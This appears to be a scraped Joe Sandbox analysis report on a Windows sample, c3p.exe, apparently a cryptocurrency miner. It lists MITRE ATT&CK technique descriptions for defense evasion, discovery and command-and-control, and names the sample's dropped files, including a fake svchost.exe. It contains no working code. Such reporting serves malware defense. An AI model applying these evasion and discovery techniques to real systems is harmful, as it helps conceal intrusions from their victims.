Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c3p.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\debug\c3p\SHA256SUMS

C:\Windows\debug\c3p\WinRing0x64.sys

C:\Windows\debug\c3p\cmd.bat

C:\Windows\debug\c3p\config.json

C:\Windows\debug\c3p\svchost.exe

C:\Windows\debug\c3p\systems.exe

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
c3p.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre